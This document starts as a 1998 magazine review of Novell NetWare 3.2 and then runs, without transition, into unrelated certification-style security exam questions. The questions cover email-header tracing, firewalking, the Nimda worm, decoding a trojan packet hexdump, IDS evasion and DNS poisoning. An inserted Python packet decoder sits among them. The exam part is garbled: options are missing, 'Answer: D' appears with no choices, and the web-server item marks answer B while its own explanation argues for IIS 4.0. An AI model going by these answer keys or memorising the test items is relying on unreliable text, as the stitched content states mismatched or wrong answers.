Sandy Stevens, 01 Jul 1998

If it's not broken, why fix it? Thousands of NetWare 3 administrators have asked this question when considering whether or not to upgrade to intraNetWare. NetWare 3 continues to maintain significant customer loyalty and to add value to companies, as proven by an installed base of approximately 1.5 million servers worldwide. To address the needs of companies that have chosen not to upgrade to intraNetWare at this time, Novell has released NetWare 3.2, which provides both updates and enhancements for existing NetWare 3 servers.

MORE RELIABLE AND EASIER TO MANAGE

Whether you are planning to install a new NetWare 3.2 server or to upgrade from NetWare 3.11 or NetWare 3.12, you will find that NetWare 3.2 offers several features that make it worth the time and money.
(For more information about various NetWare 3.2 purchasing options, see 'Which NetWare 3.2 Purchasing Option Should You Choose?') For example, NetWare 3.2 delivers the following features:

- NetWare 3 updates
- Year 2000 updates
- Network management utilities
- Updated 32-bit client software
- Two versions of Netscape Navigator
- Two-user version of intraNetWare

NETWARE 3 UPDATES

For years, NetWare 3 administrators have faced a continuous deluge of updates, including patches; fixes; and LAN, WAN, and disk driver updates. Although these updates are available free through Novell's Support Connection World-Wide Web site, keeping track of them can be an enormous management task. Most NetWare 3 administrators have been forced to take a reactive approach to updates: first encounter a problem, and then see if an update is available to fix it. NetWare 3.2 offers a solution to this dilemma by providing all of the current updates in one convenient package. With NetWare 3.2, these updates are applied automatically, eliminating the need for you to locate and download updates as problems occur.
YEAR 2000 UPDATES

You have probably heard a lot of horror stories about computer systems worldwide coming to a screeching halt on January 1, 2000 because these systems are not designed to support a four-digit date format. (For more information about the year 2000 problem, see 'Exterminating the Millennium Bug Before It Wreaks Havoc on Your Company's Network,' NetWare Connection, June 1998, pp. 8-20.) Fortunately, you don't need to worry about your company's NetWare network: Novell has conducted extensive product testing to validate that the latest versions of most of its products are year 2000 ready. (For more information about Novell's year 2000 efforts, see 'Novell's Project 2000: Making Novell's Products Year 2000 Ready,' NetWare Connection, June 1998, pp.) However, Novell is providing optional year 2000 updates for some of its products, including NetWare 3. According to John Canfield, Novell's year 2000 marketing manager, these updates 'are not critical to the function of the operating system. Most of the problems we found are date display issues for which we have released the updates.'

To make it easy for you to apply the optional year 2000 updates for NetWare 3, Novell has included these updates with NetWare 3.2. Novell has also included its latest 32-bit client software, which is year 2000 ready. (See the 'Updated 32-Bit Client Software' section.) By simply upgrading to NetWare 3.2 and installing the updated 32-bit client software, your company's network will be year 2000 ready, as long as all of the hardware and software you use on the network is also year 2000 ready. You can download year 2000 updates for other Novell products, such as intraNetWare, NetWare for Small Business, and BorderManager, from Novell's Project 2000 web site.

NETWORK MANAGEMENT UTILITIES

In addition, NetWare 3.2 includes new network management utilities, making it easier for you to manage your company's network.
The following utilities are the most significant:

- The Windows-based SYSCON utility
- The CONFIG NetWare Loadable Module (NLM) and the NetWare Config Reader utility
- Other useful utilities, such as the CRON NLM, the TBACKUP NLM, and the TCOPY NLM

Windows-Based SYSCON Utility

NetWare 3 administrators manage users and network resources through Novell's DOS-based SYSCON utility. Most experienced NetWare 3 administrators agree that this utility isn't too difficult to use, even if it is DOS based. After you become familiar with the various menu options, you can move through the screens with lightning speed. Personally, I like the DOS-based version of the SYSCON utility, but I must admit that using a DOS-based utility in a world dominated by Windows seems somewhat archaic. To bring NetWare 3 up-to-date, Novell has included a Windows-based version of the SYSCON utility with NetWare 3.2. As shown in Figure 1, the Windows-based SYSCON utility provides a graphical, hierarchical view of your company's network, allowing you to manage any version of NetWare 3.

Figure 1: The Windows-based SYSCON utility provides a graphical view of your company's network.
Although Figure 1 shows multiple NetWare 3 servers in a hierarchical view, don't be fooled: Like other versions of NetWare 3, NetWare 3.2 uses a flat-file bindery for storing network information, such as information about users, groups, and printers. In fact, you can see that the top of the hierarchical view in Figure 1 displays server objects, which contain users and groups at the same level, just as the bindery does.

Although the Windows-based SYSCON utility is bound by the limitations of the bindery, this utility offers several time-saving features over the DOS-based version. For example, the Windows-based SYSCON utility allows you to conveniently manage multiple NetWare 3 servers from a single GUI. Of course, to manage multiple NetWare 3 servers, you must be authenticated to each NetWare 3 server as the SUPERVISOR user or as a SUPERVISOR-equivalent user. The management options available in the Windows-based SYSCON utility are nearly identical to the management options available in the DOS-based version. (See Figure 2.) However, the Windows-based SYSCON utility also allows you to perform some limited management tasks across NetWare 3 servers. For example, you can copy login scripts and configuration files to multiple NetWare 3 servers by using the Windows-based cut and paste features. You can also view user and server configuration information in separate windows simultaneously, and you can print user configuration information. (See Figure 3.)

Figure 2: You can use the Windows-based SYSCON utility to manage user accounts and network resources on all of the NetWare 3 servers on your company's network.

Figure 3: The Windows-based SYSCON utility allows you to view and print information about users.

The Windows-based SYSCON utility does have one drawback: It does not offer any drag-and-drop capabilities, either within a single bindery or across NetWare 3 servers. In general, I find the Windows-based SYSCON utility to be intuitive and easy to use. However, as mentioned earlier, you are still bound by the limitations of the bindery. One major limitation is that each NetWare 3 server has its own bindery that you must maintain independently of other NetWare 3 servers. As a result, you must perform redundant management tasks, such as creating and maintaining a separate user account on each NetWare 3 server a user must access. This limitation can be addressed only by Novell Directory Services (NDS).
So when redundant management tasks become overwhelming in a NetWare 3 environment, it is time to upgrade to intraNetWare or NetWare 5.

CONFIG NLM and the NetWare Config Reader Utility

As mentioned earlier, NetWare 3 administrators must constantly ensure that they have applied the latest updates to their NetWare 3 servers, a problem that Novell has solved by including all of the current updates with NetWare 3.2. NetWare 3 administrators must also keep track of the patch levels and NLM versions running on their NetWare 3 servers. Novell has solved this problem as well by including the CONFIG NLM and the NetWare Config Reader utility in NetWare 3.2. These utilities work together to gather and verify the patch levels and NLM versions on a NetWare 3 server. These utilities then compare the configuration information to the latest configuration recommendations available from Novell and to other NetWare 3 servers on your company's network.

When you run the CONFIG NLM at the server console, all of the NetWare 3 server's configuration information, including the patch levels and NLM versions running on this server, is written to a text file called CONFIG.TXT. Then the NetWare Config Reader utility uses this file, which is stored in the SYS:SYSTEM directory, to compare the server's configuration information with the latest configuration recommendations available from Novell. You can download these configuration recommendations from Novell's Support Connection web site by selecting the Download option from within the NetWare Config Reader utility. Figure 4 shows the NetWare Config Reader utility's analysis of a NetWare 3.12 server called HOU-TOMI. In Figure 4, the STREAMS NLM is highlighted in red, which indicates that this NLM is out of date and should be updated. If any of the NLMs listed in the Patches window were out of date, these NLMs would also be highlighted in red.

Figure 4: The NetWare Config Reader utility compares the server's configuration information with the configuration recommended by Novell.

You could select the Suggestions tab in the NetWare Config Reader utility to view a summary of possible problems on the HOU-TOMI server and suggestions for how to fix these problems. For example, Figure 5 shows that the STREAMS NLM is out of date, that the latest NetWare 3.12 patch set needs to be loaded, and that a particular SET parameter should be modified.

Figure 5: The NetWare Config Reader utility summarizes the possible problems on a NetWare 3 server and provides suggestions for fixing these problems.

With the NetWare Config Reader utility, you could also view the HOU-TOMI server's entire CONFIG.TXT file, NCF and DOS files, volume statistics, and information about which interrupts are currently being used. In addition, you could compare the HOU-TOMI server's CONFIG.TXT file to the CONFIG.TXT file on another NetWare 3 server. As you can see, the CONFIG NLM and the NetWare Config Reader utility are valuable management tools, whether your company has one NetWare 3 server or 50. These utilities take the guesswork out of troubleshooting many common NetWare 3 problems.

Other Useful Utilities

Novell has also included other useful utilities with NetWare 3.2, including the CRON NLM, the TBACKUP NLM, and the TCOPY NLM.
The CRON NLM provides a quick and easy way to schedule server console commands, such as loading and unloading NLMs at specific times. For example, you could configure the CRON NLM to automatically load a backup NLM at 2 a.m. daily and to automatically unload this NLM after the backup process is completed. You can even use the CRON NLM to shut down a NetWare 3 server at a specific time. In addition, you can view all of the server console commands that you have scheduled using the CRON NLM. The schedule for each NetWare 3 server is stored in the CRONTAB file, which is located in the SYS:SYSTEM directory.

Like the CRON NLM, the TBACKUP NLM and the TCOPY NLM simplify network management tasks. These utilities allow you to back up and restore trustee assignments and inherited rights masks. Far too often, trustee assignments and inherited rights masks are not properly backed up, a fact that many NetWare 3 administrators don't discover until they try to restore trustee assignments and inherited rights masks after a server failure or upgrade. With the TBACKUP NLM, you can back up the trustee assignments and inherited rights masks on a NetWare server. The TBACKUP NLM creates the TRESTORE.BAT file, which you can run later to restore these trustee assignments and inherited rights masks. The TCOPY NLM, on the other hand, allows you to copy trustee assignments from one directory structure to another. This capability is especially useful when you are migrating data across NetWare 3 servers.

UPDATED 32-BIT CLIENT SOFTWARE

As mentioned earlier, NetWare 3.2 includes the latest 32-bit Novell client software:

- intraNetWare Client 4.11 for Windows NT
- intraNetWare Client 2.2 for Windows 95
- intraNetWare Client 2.2 for DOS and Windows

This client software offers some significant improvements over previous versions of Novell's client software. When you install the latest 32-bit client software, the first improvement you will notice is a significant increase in performance.
Because this client software is 32-bit enabled, you have faster access to network services and network resources. The latest 32-bit client software also offers increased performance through its support of Novell's packet burst technology, which allows the client software to transmit multiple packets across the network before requiring an acknowledgment from the recipient. In addition, this client software supports Novell's Large Internet Packet (LIP) technology, which decreases the number of packets transmitted across bridges and routers by enabling each packet to be larger than 512 bytes, thus enhancing throughput.

In addition, the latest 32-bit client software is implemented as a set of NLMs, which replaces the Virtual Loadable Module (VLM) architecture that was used in older, 16-bit versions of Novell's client software. Using an NLM architecture makes the client software dynamic, modular, and portable. For example, the same NLM-based LAN drivers that you install on a NetWare 3 server can now be installed on workstations as well.

The latest 32-bit client software also offers a graphical login, rather than the cumbersome DOS-based login used with older, 16-bit versions of Novell client software. (See Figure 6.) With this graphical login, users can quickly and easily log in to NetWare 3 servers from within Windows.

Figure 6: Novell's updated 32-bit client software offers a graphical login.

Finally, the latest 32-bit client software offers an autoreconnect feature: If the network connection is temporarily lost, the client software automatically tries to reestablish a user's network connection, along with any associated drive and printer mappings.

Although these improvements are appealing, the thought of upgrading the client software on every workstation on your company's network can be disconcerting. The good news is that you don't have to upgrade every workstation: All client software that shipped with previous versions of NetWare 3 is fully backward compatible with NetWare 3.2. The even better news is that when you are ready to begin upgrading the client software, you can use NetWare 3.2's automatic client upgrade (ACU) feature to perform the upgrade process in a few easy steps. The ACU feature allows you to set up the necessary directories, configuration files, and login scripts so that the new client software is automatically installed on users' workstations when these users log in to a NetWare 3.2 server.

TWO VERSIONS OF NETSCAPE NAVIGATOR

In addition to offering Novell updates, utilities, and client software, NetWare 3.2 includes two versions of Netscape Navigator: Netscape Navigator 4.04 and Netscape Navigator 3.01, both of which support Windows NT, Windows 95, Windows 3.x, Macintosh on the Power PC processor, and Macintosh on the 68000 processor.
Since accessing the Internet has become a daily necessity for most users, offering a network operating system and a web browser in one package makes sense. When you purchase or upgrade to NetWare 3.2, you receive the number of Netscape Navigator user licenses that match the number of NetWare 3.2 user licenses you own. For example, if you purchased a 10-user version of NetWare 3.2, you would receive 10 Netscape Navigator user licenses.

TWO-USER VERSION OF INTRANETWARE

Finally, NetWare 3.2 includes a fully functional, two-user version of intraNetWare, which allows you to evaluate the benefits of intraNetWare and NDS. This little gesture alone sends a strong message from Novell: Although you may not have chosen to upgrade to intraNetWare at this time, you might want to take a closer look at what you are missing.

CONCLUSION

With NetWare 3.2, Novell has done more than simply bundle existing software for resale. NetWare 3.2 provides many solid enhancements that make this product worth the cost and effort to upgrade. And although you can download some of the NetWare 3.2 components (such as updates) from Novell's Support Connection web site, having all of these components on a single CD-ROM is extremely convenient. You will not only avoid the time-consuming task of figuring out what to download and where to download it from, but you will also be able to manage your company's network more easily. If you are looking for a good workgroup solution, you should seriously consider using NetWare 3.2. Because NetWare 3 has been on the market for more than 9 years and has 1.5 million servers installed, NetWare 3.2 is certainly a sure bet. For more information about NetWare 3.2, visit Novell's web site. You can also call 1-888-321-4272 or 1-801-228-4272.
Sandy Stevens is a freelance writer based in Salt Lake City, Utah. She is the coauthor of Novell's Guide to NetWare Printing, Novell's Guide to Integrating IntranetWare and NT, and Novell's Guide to BorderManager, all of which are available from Novell Press.

NetWare Connection, July 1998, pp. 14-21

Which NetWare 3.2 Purchasing Option Should You Choose?
Novell offers three purchasing options for NetWare 3.2. The purchasing option you choose depends on whether you are upgrading an existing NetWare 3 server and what version of NetWare 3 this server is currently running.

Option: NetWare 3.2 Enhancement Pack
Pricing: Available if you are upgrading from NetWare 3.12 to NetWare 3.2. Pricing is stratified on a per-server basis. The suggested retail price per server is U.S.

Option: NetWare 3.2 Upgrade
Pricing: Available if you are upgrading from older versions of NetWare, such as NetWare 3.11, to NetWare 3.2. The product includes the upgrade to NetWare 3.12 and the NetWare 3.2 Enhancement Pack. Pricing is stratified on a per-user basis. The suggested retail price for five to 10 users is U.S.

Option: New NetWare 3.2 Product
Pricing: Available if you are installing a new NetWare 3.2 server. This product includes NetWare 3.12 and the NetWare 3.2 Enhancement Pack. Pricing is stratified on a per-user basis. The suggested retail price for five users is U.S.

For detailed product and pricing information, visit Novell's World-Wide Web site. You can also call 1-888-321-4272 or 1-801-228-4272.

NetWare Connection, July 1998, p.
The following is an email header. What address is that of the true originator of the message?

Return-Path:
Received: from smtp.com (fw.emumail.com 215.52.220.122) by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807 for; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from (19.25.19.10) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: 'Bill Gates'
To: 'mikeg'
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary='-=NextPart000005201C35DE1.03202950'
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal

A. 19.25.19.10
B. 51.32.123.21
C. 168.150.84.123
D. 215.52.220.122
E.

Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device ('firewall') will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop, where they will expire and elicit an ICMP TIME_EXCEEDED message. If the gateway host does not allow the traffic, it will likely drop the packets and no response will be returned.

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this?

Answer: D

Explanation: The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines and allow intruders the ability to execute arbitrary commands within the Local System security context on machines running the unpatched versions of IIS.
Jason's Web server was attacked by a trojan virus. He runs a protocol analyzer and notices that the trojan communicates to a remote server on the Internet. Shown below is the standard 'hexdump' representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping it to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet.

A. Port 1890 (Net-Devil Trojan)
B. Port 1786 (Net-Devil Trojan)
C. Port 1909 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)

ETHER: Destination address: 0000BA5EBA11
ETHER: Source address: 00A0C9B05EBD
ETHER: Frame Length: 1514 (0x05EA)
ETHER: Ethernet Type: 0x0800 (IP)
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 1500 (0x5DC)
IP: Identification = 7652 (0x1DE4)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 127 (0x7F)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xC26D
IP: Source Address = 10.0.0.2
IP: Destination Address = 10.0.1.201
TCP: Source Port = Hypertext Transfer Protocol
TCP: Destination Port = 0x1A0B
TCP: Sequence Number = 97517760 (0x5D000C0)
TCP: Acknowledgement Number = 78544373 (0x4AE7DF5)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 28793 (0x7079)
TCP: Checksum = 0x8F27
TCP: Urgent Pointer = 0 (0x0)

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application?

A. Create a SYN flood
B. Create a network tunnel
C. Create multiple false positives
D. Create a ping flood

You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as a direct result of this activity. The employee explains that he used the modem because he had to download software for a department project. What can you do to solve this problem?

A. Install a network-based IDS
B. Reconfigure the firewall
C. Conduct a needs analysis
D. Enforce your security policy

Joseph was the Web site administrator for Mason Insurance in New York, whose main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site.
One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message: 'Hacker Message: You are dead!' From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes were apparent.

Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page:

H@cker Mess@ge: Y0u @re De@d!

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?

A. ARP spoofing
B. SQL injection
C. DNS poisoning
D. Routing table injection

Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers to find the cookie recipe. This is an example of what kind of attack?

A. Reverse Psychology
B. Social Engineering
C. Reverse Engineering
D. Spoofing Identity
E. Faking Identity

To scan a host downstream from a security gateway, Firewalking:

A. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets
B. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway
C. Sends an ICMP 'administratively prohibited' packet to determine if the gateway will drop the packet without comment
D. Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway

While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan:

Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
Port State Service
21/tcp open ftp
25/tcp open smtp
53/tcp closed domain
80/tcp open http
443/tcp open https
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed - 1 IP address (1 host up) scanned in 277.483 seconds

What should be your next step to identify the OS?

A. Perform a firewalk with that system as the target IP
B. Perform a tcp traceroute to the system using port 53
C. Run an nmap scan with the -v-v option to give a better output
D. Connect to the active services and review the banner information

A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?

A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
B. An attacker submits user input that executes an operating system command to compromise a target system
C. An attacker gains control of a system to flood the target system with requests, preventing legitimate users from gaining access
D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database

You may be able to identify the IP addresses and machine names for the firewall, and the names of internal mail servers by:

A. Sending a mail message to a valid address on the target network, and examining the header information generated by the IMAP servers
B. Examining the SMTP header information generated by using the -mx command parameter of DIG
C. Examining the SMTP header information generated in response to an e-mail message sent to an invalid address
D. Sending a mail message to an invalid address on the target network, and examining the header information generated by the POP servers

Central Frost Bank was a medium-sized, regional financial institution in New York. The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a Web browser. John Stevens was in charge of information security at Central Frost Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances of many of Central Frost's customers had been changed!
However, money hadn't been removed from the bank. Instead, money was transferred between accounts.

000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 .^.^.E.
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 ....@....m......
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 .P.u.P.
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.' .HTTP/1.1.2
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK.Via.1.0.
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER.Proxy-C
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection.Keep-
070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive.Content-L
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength.29674.Co
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type.text
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html.Server.
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 .Microsoft
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 .Date.Sun.25.
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT.Accept-Ra
0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges.bytes.Las
100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified.Mon,
110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A .19.Jul.1999.07:
120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT.ETag:
130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31 .' 08b78d3b9d1be1
140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E :a4a'.
150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ
160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap.sniff
170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ.
180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20 .Sniffing.
190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap
1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F .sniffer).FAQ.This.docu
1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que
1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap
1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into.comp
1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an

This packet was taken from a packet sniffer that monitors a Web server. This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in an empty line (0D 0A 0D 0A), and then the data.
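The decoding described above, and the destination-port lookup asked for in the Net-Devil question earlier, as an added example that is not part of the original page: it parses a copy of the dump (the first 0x150 bytes, transcribed from the hex above without the ASCII column; the sixteenth byte of line 010, lost in this copy, is assumed to be 00 from the decoded destination address 10.0.1.201), verifies the IP header checksum, and walks the Ethernet, IP, TCP and HTTP headers using their own length fields rather than fixed offsets.

```python
"""Decode a hexdump of an Ethernet/IPv4/TCP/HTTP packet (added example)."""
import struct

# Constructed copy of the page's dump, offsets 000-140 only, which is enough to
# reach the end of the HTTP header. The ASCII column is omitted. The last byte
# of line 010 is an assumption (00), restored from the decoded destination
# address 10.0.1.201 = 0A 00 01 C9, which straddles lines 010 and 020.
HEXDUMP = """\
000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00
010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00
020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10
030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32
040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20
050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43
060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D
070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C
080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F
090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74
0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D
0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30
0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20
0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35
0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61
0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73
100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C
110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A
120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A
130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31
140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E
"""


def parse_hexdump(text):
    """Turn 'offset b0 ... b15 [ascii]' lines into bytes, refusing gaps in the offsets."""
    raw = bytearray()
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        offset = int(fields[0], 16)
        if offset != len(raw):
            raise ValueError(f"dump is not contiguous at offset {offset:03X}")
        raw.extend(int(b, 16) for b in fields[1:17])  # 16 hex bytes, ASCII column ignored
    return bytes(raw)


def ip_checksum(header):
    """RFC 1071 ones-complement sum over the IP header; 0 means the stored checksum is valid."""
    total = 0
    for i in range(0, len(header) - 1, 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_packet(raw):
    """Walk the 14-byte Ethernet header, then IP and TCP (sized by their own header-length
    fields), then the HTTP header that ends at the first 0D 0A 0D 0A."""
    eth_type = struct.unpack("!H", raw[12:14])[0]
    if eth_type != 0x0800:
        raise ValueError(f"not an IPv4 frame: ethertype 0x{eth_type:04X}")
    ip = raw[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, ident = struct.unpack("!HH", ip[2:6])
    ttl, proto = ip[8], ip[9]
    if proto != 6:
        raise ValueError(f"not TCP: protocol {proto}")
    tcp = ip[ihl:]
    src_port, dst_port, seq, ack = struct.unpack("!HHII", tcp[:12])
    data_offset = (tcp[12] >> 4) * 4
    flags = tcp[13]
    payload = tcp[data_offset:]
    head, sep, _body = payload.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("HTTP header is not terminated inside the captured bytes")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return {
        "src_ip": ".".join(str(b) for b in ip[12:16]),
        "dst_ip": ".".join(str(b) for b in ip[16:20]),
        "ip_total_length": total_len,
        "ip_id": ident,
        "ttl": ttl,
        "ip_checksum_ok": ip_checksum(ip[:ihl]) == 0,
        "src_port": src_port,
        "dst_port": dst_port,
        "seq": seq,
        "ack": ack,
        "flags": flags,
        "status": lines[0],
        "headers": headers,
    }


def decode_hexdump(text):
    """Convenience wrapper: hexdump text in, decoded fields out."""
    return decode_packet(parse_hexdump(text))


if __name__ == "__main__":
    for key, value in decode_hexdump(HEXDUMP).items():
        print(f"{key}: {value}")
```

The destination port read from the raw bytes (07 75) is 1909, while the decoded listing quoted with the Net-Devil question shows 0x1A0B (6667), so the two copies of the packet on this page disagree on that one field. Everything else (addresses, sequence and acknowledgement numbers, window, flags, checksum) matches, and the IP checksum verifies, which is the check to run before trusting any hand-transcribed dump.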
By examining the packet identify the name and version of the Web server? Apache 1.2 B. Linux WServer 2.3. Answer: B We see that the server is Microsoft, but the test designer didn't want to make it easy for you. So what they did is blank out the IIS 4.0. The key is in line '0B0' as you see: 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30.Microsoft 49 is I, so we get II 53 is S, so we get IIS 2F is a space 34 is 4 2E is. 30 is 0 So we get IIS 4.0 The answer is B If you don't remember the ASCII hex to Character, there are enough characters and numbers already converted.
